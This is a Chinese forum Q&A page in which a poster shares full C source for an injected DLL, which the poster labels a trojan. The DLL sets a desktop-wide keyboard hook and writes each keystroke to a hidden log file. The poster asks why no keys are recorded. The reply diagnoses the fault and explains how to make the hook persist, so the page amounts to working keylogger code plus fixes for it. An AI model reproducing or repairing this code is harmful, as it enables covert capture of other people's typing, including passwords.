
dll注入进程后在dll内部安装钩子函数

发布时间: 2013-01-18 10:22:42 作者: rapoo

dll注入进程后,在dll内部安装钩子函数并截取键盘输入问题
头文件（hook_dll.h，源文件中以 #include "hook_dll.h" 引用）

#include <windows.h>
#ifdef __cplusplus
// extern "C" keeps the exported names undecorated ("StartHook"/"StopHook"),
// presumably so an injector can resolve them by name; __declspec(dllexport)
// puts them in the DLL's export table.
#define DLLEXPORT extern "C" __declspec (dllexport)
#else
#define DLLEXPORT __declspec (dllexport)
#endif


// Installs the WH_KEYBOARD hook whose procedure lives in this DLL.
// Returns 0 on success or when a hook is already recorded, 1 if the log file
// could not be opened (the hook is removed again in that case).
// NOTE(review): a failed SetWindowsHookEx is not detected, so 0 does not
// guarantee a live hook.
DLLEXPORT int CALLBACK StartHook();
// Removes the hook installed by StartHook. Returns the BOOL result of
// UnhookWindowsHookEx, or FALSE when no hook handle was recorded.
DLLEXPORT int CALLBACK StopHook();

源文件（.cpp）

#include <stdio.h>
#include "hook_dll.h"


// The globals below are placed in a named section that the linker directive
// further down marks read/write/shared, so every process that maps this DLL
// sees a single copy of them.
#pragma data_seg("mydata")
FILE *fp = NULL;            // scratch handle; each function opens and closes it itself
int num = 0;                // never read in the visible code (StartHook shadows it with a local)
HHOOK glhHookKey = NULL;    // handle from SetWindowsHookEx; NULL means "no hook installed"
HINSTANCE glhInstance=NULL; // this DLL's module handle, captured in DllMain for SetWindowsHookEx

#pragma data_seg()

// NOTE(review): a writable shared section is a cross-process hazard — any
// process that loads this DLL can overwrite fp/glhHookKey/glhInstance for all
// the others, and there is no synchronisation around them. A FILE* is also a
// pointer into one process's CRT state, so sharing fp across processes has no
// useful meaning; only the hook handle arguably needs to be shared.
#pragma comment(linker,"/section:mydata,rws")


// WH_KEYBOARD hook procedure (defined below); must live in this DLL so the
// system can invoke it in the context of whichever thread receives the key.
LRESULT CALLBACK KeyProc(int nCode,WPARAM wParam,LPARAM lParam);

// DLL entry point. On process attach it records the module handle, installs
// the keyboard hook and shows a message box; on detach it shows another box
// and removes the hook.
// NOTE(review): DllMain runs while the loader lock is held, and the documented
// guidance is to call nothing beyond kernel32 from it. MessageBox pumps
// messages and can load further DLLs, and SetWindowsHookEx (via StartHook) is
// a user32 call — both belong in a separately exported initialisation function
// called after LoadLibrary has returned. If the DLL is loaded by a short-lived
// remote thread, the hook is also owned by that thread; Windows removes a
// thread's hooks when the thread exits, which would leave glhHookKey set but
// the hook dead — TODO confirm against the injection method used.
BOOL APIENTRY DllMain( HINSTANCE hInstance,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
glhInstance = hInstance; // needed as the hMod argument of SetWindowsHookEx
StartHook();             // return value (0/1) is ignored here
MessageBox(NULL,"木马注入","木马",MB_OK); // debug notification
break;
case DLL_PROCESS_DETACH:
MessageBox(NULL,"木马离去","木马",MB_OK); // debug notification
StopHook();
break;
}
return TRUE;
}

// Installs a desktop-wide WH_KEYBOARD hook (dwThreadId == 0) whose procedure
// is KeyProc in this DLL, then appends a "start" marker to the log file.
// Returns 0 on success or if a hook handle is already recorded, 1 if the log
// file cannot be opened (the hook is removed again before returning).
// NOTE(review): the result of SetWindowsHookEx is never checked. If it
// returns NULL, glhHookKey stays NULL, the "start" marker is still written and
// 0 is returned. Check for NULL and report GetLastError(). (The page reports
// that the "stop" marker was written too, which — given StopHook's guard —
// means glhHookKey was non-NULL in that run, so the install itself did not
// fail there.)
DLLEXPORT int CALLBACK StartHook()
{
int num=0; // shadows the global `num`; never used
if(glhHookKey != NULL)
{
return 0; // already hooked
}
// glhInstance must be the module containing KeyProc; 0 = all threads on this desktop.
glhHookKey = SetWindowsHookEx(WH_KEYBOARD,KeyProc,glhInstance,0);
{ // bare block; it introduces no scope that matters
fp = fopen("c://keyLog.txt","at+");
if(fp != NULL)
{
fprintf(fp,"\nKey Record start.\n");
fclose(fp);
}
else
{
// Log file unavailable: undo the hook and report failure.
MessageBox(NULL,"open file err",0,0);
StopHook();
return 1;
}
return 0;
}

}
// Removes the keyboard hook recorded in glhHookKey and appends a "stop" marker
// to the log file. Returns the BOOL from UnhookWindowsHookEx, or FALSE when no
// hook handle was recorded.
// NOTE(review): the "stop" marker is written and glhHookKey is cleared whether
// or not UnhookWindowsHookEx succeeded, so seeing the marker in the log only
// proves the handle was non-NULL, not that the hook was still live. Check
// bResult (and GetLastError()) before treating the hook as having been active.
DLLEXPORT int CALLBACK StopHook()
{
BOOL bResult=false;
if(glhHookKey)
{
bResult = UnhookWindowsHookEx(glhHookKey);
fp = fopen("c://keyLog.txt","at+");
if(fp != NULL)
{
fprintf(fp,"\nKey Record stop.\n");
fclose(fp);
}
glhHookKey = NULL; // cleared even if unhooking failed
}
return bResult;

}

// WH_KEYBOARD hook procedure. Invoked in the context of the thread that
// receives the keystroke. Writes the key name of each initial key-down to the
// log file and always passes the event on to the next hook in the chain.
LRESULT CALLBACK KeyProc(int nCode,WPARAM wParam,LPARAM lParam)
{
// KeyboardProc contract: nCode < 0 must be forwarded untouched. HC_NOREMOVE
// (message peeked but not removed) is skipped, presumably so the same key is
// not logged twice when it is later removed from the queue.
if(nCode < 0 || nCode == HC_NOREMOVE)
return ::CallNextHookEx(glhHookKey, nCode, wParam, lParam);

// Bit 30 of the WH_KEYBOARD lParam is the previous-key-state flag. It is set
// for auto-repeat key-downs and for key-ups, so only the first key-down of
// each press gets past this check.
if(lParam & 0x40000000)
{
return ::CallNextHookEx(glhHookKey, nCode, wParam, lParam);
}


char szKey[80];
// Turns the scan-code/extended-key bits of lParam into a name like "A" or "Space".
// NOTE(review): the return value is ignored; if it is 0 the buffer content is
// unspecified and is then displayed and written as a string. Initialise the
// buffer (char szKey[80] = {0};) or check the result.
::GetKeyNameText(lParam, szKey, 80);
// NOTE(review): MessageBox inside a hook procedure blocks the hooked thread in
// a nested message loop; debugging only.
MessageBox(NULL,szKey,"木马",MB_OK);
fp = fopen("c://keyLog.txt","at+");
if(fp != NULL)
{
fprintf(fp,"%s",szKey); // names are appended back-to-back with no separator
fclose(fp);
}
return CallNextHookEx(glhHookKey,nCode,wParam,lParam);
}

我把这个dll注入记事本进程,在注入成功的时候会有MessageBox(NULL,"木马注入","木马",MB_OK);调用,关闭记事本有MessageBox(NULL,"木马离去","木马",MB_OK);调用,但是我输入abc,发现c://keyLog.txt,只有
fprintf(fp,"\nKey Record start.\n"); 和 fprintf(fp,"\nKey Record stop.\n"); 两条信息（分别在 StartHook() 和 StopHook() 里输出），说明处理键盘消息的 LRESULT CALLBACK KeyProc(int nCode,WPARAM wParam,LPARAM lParam) 根本没有被调用。这是什么问题？是安装钩子函数出了问题，还是其他原因？


[解决办法]

引用:
引用：我也遇到过，钩子无效，不知道怎么回事，有解决的办法吗？一直没解决。

好吧，我推测是因为安装钩子的模块和钩子所在的模块是同一模块——但这只是猜测，未经验证。更值得先排查的两点：(1) 代码没有检查 SetWindowsHookEx 的返回值，应在其返回 NULL 时调用 GetLastError() 看原因；不过从“stop 标记也写入了文件”来看，那次运行中 glhHookKey 并不为 NULL，说明钩子安装本身是成功的。(2) StartHook 是在 DllMain 里被调用的；如果是用 CreateRemoteThread + LoadLibrary 注入，那么钩子就是由那个远程线程安装的，而该线程在 LoadLibrary 返回后立即退出——Windows 会在安装钩子的线程退出时自动卸载该线程的钩子。这样 glhHookKey 虽然非空，钩子却已失效，与“只有 start/stop 标记、KeyProc 从未被调用”的现象吻合。建议把 SetWindowsHookEx 移出 DllMain，改由一个会持续存活的线程调用。

